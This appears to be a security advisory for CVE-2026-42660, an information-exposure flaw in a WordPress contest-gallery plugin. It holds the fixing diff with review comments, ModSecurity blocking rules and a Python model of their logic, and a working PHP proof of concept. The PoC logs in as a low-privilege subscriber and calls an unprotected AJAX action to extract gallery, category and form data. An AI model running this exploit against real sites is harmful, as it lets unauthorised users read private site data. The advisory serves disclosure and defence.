+		$rowToUpdate = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $pid, $GalleryID));
+		if (empty($rowToUpdate)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_attach_entry_gallery_mismatch');
+		}
+
+		$user_login = '';
+		if (!empty($WpUserId)) {
+			$wpUser = get_user_by('id', $WpUserId);
+			if (empty($wpUser)) {
+				cg_backend_ajax_error_json('Selected user does not exist.', 400, 'cg_attach_user_missing');
 			}
+			$user_login = $wpUser->user_login;
+		}

-			exit();
-		} else {
-			exit();
+		$updated = $wpdb->update(
+			$tablename,
+			array('WpUserId' => $WpUserId),
+			array('id' => $pid, 'GalleryID' => $GalleryID),
+			array('%d'),
+			array('%d','%d')
+		);
+
+		if ($updated === false) {
+			cg_backend_ajax_error_json('User assignment could not be saved.', 500, 'cg_attach_update_failed');
 		}
+
+		if($rowToUpdate->Active==1){
+			$row = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				  OR
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				  GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$pid, $GalleryID, $pid, $GalleryID
+			));
+			if (!empty($row)) {
+				$row->WpUserId = $WpUserId;
+				cg_create_json_files_when_activating($GalleryID,$row);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $pid,
+			'user_id' => $WpUserId,
+			'user_login' => $user_login,
+			'detached' => empty($WpUserId)
+		));
 	}
 }
 // attach to another user --- END
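Review bot: the response contract changes from the echoed `###post_cg_attach_to_another_user successful###` marker to wp_send_json_success(), and the failure paths now emit JSON errors instead of the MISSINGRIGHTS HTML; the JavaScript that parsed the old marker is not part of this diff, so confirm it is updated in the same release or the admin UI will report failures for successful assignments. Minor: `$row->WpUserId = $WpUserId;` after the re-SELECT appears redundant, since that SELECT runs after the $wpdb->update() and already returns the new WpUserId; harmless, but it reads like a leftover from an earlier order of operations.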
@@ -1147,11 +1295,11 @@
                     $isTest = true;
                 }

-                if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
-                    $accessToken='error' ;
-                }else{
-                    $accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
-                }
+				if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
+					$accessToken='error' ;
+				}else{
+					$accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
+				}

                 if($accessToken!='error' && $accessToken!='no-internet'){
                     echo '###cgkeytrue###';
@@ -1266,7 +1414,6 @@

 // AJAX Script für set comment ---- ENDE

-
 // show paypal transaction response

 add_action('wp_ajax_post_cg_show_paypal_api_response', 'post_cg_show_paypal_api_response');
@@ -1313,46 +1460,51 @@
 if(!function_exists('post_cg_set_for_paypal_sell')){
     function post_cg_set_for_paypal_sell() {

-	    // has to be unsanitized because of the url eventually configured by user
-	    $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
-        $_POST = cg1l_sanitize_post($_POST);
-	    $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
-
         contest_gal1ery_db_check();
+        cg_backend_ajax_require_access_json();

-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
+        if (empty($_POST['cgSellContainer']) || !is_array($_POST['cgSellContainer'])) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+        $cgSellContainer = $_POST['cgSellContainer'];
+        $GalleryID = (isset($cgSellContainer['GalleryID'])) ? absint($cgSellContainer['GalleryID']) : 0;
+        $realId = (isset($cgSellContainer['realId'])) ? absint($cgSellContainer['realId']) : 0;
+        $saleAction = (isset($cgSellContainer['saleAction'])) ? sanitize_text_field($cgSellContainer['saleAction']) : '';
+        $galleryHash = (isset($_POST['cgGalleryHash'])) ? sanitize_text_field($_POST['cgGalleryHash']) : '';

-        if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
+        cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);

-            $user = wp_get_current_user();
-
-            if (
-                is_super_admin($user->ID) ||
-                in_array( 'administrator', (array) $user->roles ) ||
-                in_array( 'editor', (array) $user->roles ) ||
-                in_array( 'author', (array) $user->roles )
-            ) {
+        if (empty($realId) || empty($GalleryID) || !in_array($saleAction, array('activate', 'deactivate'), true)) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-                cg_ecommerce_sale_conf();
+        global $wpdb;
+        $tablename = $wpdb->prefix . "contest_gal1ery";
+        $entry = $wpdb->get_row($wpdb->prepare("SELECT id, GalleryID, EcommerceEntry FROM $tablename WHERE id = %d", $realId));

-                die;
+        if (empty($entry)) {
+            cg_backend_ajax_error_json('Sale entry does not exist.', 400, 'cg_sale_entry_missing');
+        }

-            }else{
-                echo "MISSINGRIGHTS - This area can be edited only as administrator, editor or author.";
-                exit();
-            }
+        if (absint($entry->GalleryID) !== $GalleryID) {
+            cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_sale_entry_gallery_mismatch');
+        }

-            exit();
+        if ($saleAction === 'deactivate' && empty($entry->EcommerceEntry)) {
+            cg_backend_ajax_error_json('Sale entry is not active.', 400, 'cg_sale_entry_not_active');
         }
-        else {
-            exit();
+
+        // has to be unsanitized because of the url eventually configured by user
+        $AllUploadsUsedText = '';
+        if (isset($_POST['cgSellContainer']['AllUploadsUsedText'])) {
+            $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
         }
+        $_POST = cg1l_sanitize_post($_POST);
+        $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
+
+        cg_ecommerce_sale_conf();
+        die;
     }
 }
 // set for paypal sell --- END
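Review bot: in post_cg_set_for_paypal_sell the access check cg_backend_ajax_require_access_json() runs after contest_gal1ery_db_check(), whereas post_cg_move_to_another_gallery calls the access check first; put it first here too so an unauthorized caller cannot trigger whatever schema checks contest_gal1ery_db_check() performs. Also, `$saleAction === 'deactivate'` is rejected when EcommerceEntry is empty, but there is no symmetric guard for 'activate' on an entry whose EcommerceEntry is already set; if cg_ecommerce_sale_conf() is not idempotent for that case, add the check here where the other state validation lives.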
@@ -1402,51 +1554,6 @@
     }
 }

-// deactivate paypal sale
-add_action( 'wp_ajax_post_cg_deactivate_ecommerce_sale', 'post_cg_deactivate_ecommerce_sale' );
-if(!function_exists('post_cg_deactivate_ecommerce_sale')){
-    function post_cg_deactivate_ecommerce_sale() {
-
-        $_POST = cg1l_sanitize_post($_POST);
-
-        contest_gal1ery_db_check();
-
-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
-
-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitiz
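Review bot: this hunk removes the `wp_ajax_post_cg_deactivate_ecommerce_sale` action and its handler outright (the diff is cut off here); the replacement is evidently the `saleAction === 'deactivate'` branch added to post_cg_set_for_paypal_sell in the previous hunk. Any client code still posting action=post_cg_deactivate_ecommerce_sale will now receive WordPress's default `0` response for an unknown AJAX action, so the caller must be migrated in the same release, and the role-array check that lived in the removed handler is from now on covered only by cg_backend_ajax_require_access_json() in the consolidated handler.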

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rules to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-42660
# Virtual patch for the two Contest Gallery AJAX actions that lack capability
# and nonce checks in <= 28.1.7. A chain is an AND of every SecRule in it, so
# the Referer test has to match the attacker's case: a scripted call (like the
# PoC below, which sends no Referer at all) or a Referer outside /wp-admin/.
# A negated @rx never matches an absent header, so the absent case needs its
# own chain using the & count operator. The Referer is client-supplied, so
# this only raises the bar; upgrading to 29.0.0 is the fix.

# Rule 1: vulnerable action posted with no Referer header
SecRule REQUEST_URI "@rx /wp-admin/admin-ajax\.php" "id:20260901,phase:2,deny,status:403,chain,msg:'CVE-2026-42660 Contest Gallery move_to_another_gallery action without Referer',severity:'CRITICAL',tag:'CVE-2026-42660',tag:'contest-gallery',tag:'wordpress'"
SecRule ARGS_POST:action "@rx ^post_cg_move_to_another_gallery(_get_inputs)?$" "t:none,chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Rule 2: vulnerable action posted from outside the WordPress admin UI
SecRule REQUEST_URI "@rx /wp-admin/admin-ajax\.php" "id:20260902,phase:2,deny,status:403,chain,msg:'CVE-2026-42660 Contest Gallery move_to_another_gallery action with non-admin Referer',severity:'CRITICAL',tag:'CVE-2026-42660',tag:'contest-gallery',tag:'wordpress'"
SecRule ARGS_POST:action "@rx ^post_cg_move_to_another_gallery(_get_inputs)?$" "t:none,chain"
SecRule REQUEST_HEADERS:Referer "!@rx /wp-admin/" "t:none"
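A small Python model of the chain semantics behind the rules above, added here as an editor's example (not part of Atomic Edge's rule set): it evaluates constructed requests against a chain whose last link is a Referer test matching `/wp-admin/`, and against the two-chain form (absent Referer, or Referer not from `/wp-admin/`). The `Request` class and the sample transactions are constructed for the example.

```python
import re
from dataclasses import dataclass, field

VULN_ACTIONS = (
    "post_cg_move_to_another_gallery_get_inputs",
    "post_cg_move_to_another_gallery",
)

@dataclass
class Request:
    """Constructed transaction model (not ModSecurity's API)."""
    uri: str
    args_post: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)  # header name -> value

def targets_vulnerable_action(req):
    """First two links of each chain: admin-ajax.php plus a vulnerable action."""
    return (re.search(r"/wp-admin/admin-ajax\.php", req.uri) is not None
            and req.args_post.get("action") in VULN_ACTIONS)

def referer_rx(req, pattern, negate=False):
    """SecRule REQUEST_HEADERS:Referer "@rx p" / "!@rx p": with the header
    absent there is no variable to test, so neither form matches."""
    referer = req.headers.get("Referer")
    if referer is None:
        return False
    matched = re.search(pattern, referer) is not None
    return (not matched) if negate else matched

def admin_referer_chain_denies(req):
    """Single chain ending in Referer "@rx /wp-admin/": denies the admin UI
    and passes a Referer-less script."""
    return targets_vulnerable_action(req) and referer_rx(req, r"/wp-admin/")

def corrected_chains_deny(req):
    """Two chains: &REQUEST_HEADERS:Referer "@eq 0", or Referer "!@rx /wp-admin/"."""
    if not targets_vulnerable_action(req):
        return False
    return "Referer" not in req.headers or referer_rx(req, r"/wp-admin/", negate=True)

AJAX = "/wp-admin/admin-ajax.php"
ADMIN = "https://example.com/wp-admin/admin.php?page=contest-gallery"
# Constructed sample transactions
SCRIPTED = Request(AJAX, {"action": VULN_ACTIONS[0]})  # PoC-style call, no Referer
FRONTEND = Request(AJAX, {"action": VULN_ACTIONS[1]}, {"Referer": "https://example.com/gallery/"})
ADMIN_UI = Request(AJAX, {"action": VULN_ACTIONS[0]}, {"Referer": ADMIN})
OTHER = Request(AJAX, {"action": "heartbeat"})
```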

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42660 - Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 - Authenticated (Subscriber+) Sensitive Information Exposure

// Configuration - set these before running
$target_url = 'http://example.com'; // WordPress site URL (no trailing slash)
$username   = 'subscriber';         // WordPress username with Subscriber role
$password   = 'password';           // User password
$cookie_jar = '/tmp/cve_cookies.txt';

// Remove the session cookie file however the script exits (die() included)
register_shutdown_function(function () use ($cookie_jar) {
    if (file_exists($cookie_jar)) {
        unlink($cookie_jar);
    }
});

// Step 1: Authenticate to WordPress and get cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query([
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie'  => 1
    ]),
    CURLOPT_HEADER         => true,  // keep headers so Set-Cookie can be inspected
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_SSL_VERIFYPEER => false  // lab use only: skips TLS certificate validation
]);
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// A successful login answers 302 to redirect_to and sets a wordpress_logged_in_*
// cookie; a failed login re-renders the form with HTTP 200, so the status code
// alone cannot distinguish the two.
if ($http_code !== 302 || stripos((string) $response, 'wordpress_logged_in_') === false) {
    die("Authentication failed (HTTP $http_code)\n");
}
echo "[+] Authenticated as $username\n";

// Step 2: Call the get_inputs AJAX handler, which in <= 28.1.7 answers any
// logged-in user (no capability check, no nonce)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $ajax_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => [
        'action' => 'post_cg_move_to_another_gallery_get_inputs'
    ],
    CURLOPT_COOKIEFILE     => $cookie_jar,
    CURLOPT_SSL_VERIFYPEER => false
]);
$ajax_response = curl_exec($ch);
$http_code     = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    die("AJAX request failed (HTTP $http_code)\n");
}

$json = json_decode((string) $ajax_response, true);
if (json_last_error() !== JSON_ERROR_NONE) {
    die("Failed to parse JSON response: " . json_last_error_msg() . "\n");
}

// Check for successful data extraction
if (isset($json['success']) && $json['success'] === true && is_array($json['data'] ?? null)) {
    $data        = $json['data'];
    $gallery_ids = $data['galleryIDs'] ?? [];
    $categories  = $data['allCategoriesByGalleryID'] ?? [];
    $forms       = $data['contact_forms_by_gallery_id'] ?? [];
    echo "[+] Successfully extracted sensitive data:\n";
    echo "    - Gallery IDs found: " . count($gallery_ids) . "\n";
    echo "    - Categories by Gallery: " . count($categories) . "\n";
    echo "    - Contact forms by gallery: " . count($forms) . "\n\n";

    // Display first 5 gallery IDs as sample
    echo "[+] Sample Gallery IDs:\n";
    $count = 0;
    foreach ($gallery_ids as $gallery) {
        if ($count >= 5) break;
        // json_decode(..., true) returns arrays, not objects; also tolerate a bare ID
        $id = is_array($gallery) ? ($gallery['id'] ?? json_encode($gallery)) : $gallery;
        echo "    - Gallery ID: $id\n";
        $count++;
    }

    // Display sample category data
    echo "\n[+] Sample Category Data:\n";
    $count = 0;
    foreach ($categories as $galleryId => $cats) {
        if ($count >= 3) break;
        echo "    Gallery $galleryId:\n";
        foreach ((array) $cats as $cat) {
            echo "        - Category ID: " . ($cat['id'] ?? '?') . ", Name: " . ($cat['name'] ?? '?') . "\n";
        }
        $count++;
    }
} else {
    echo "[-] Exploit failed. Response:\n";
    print_r($json);
}
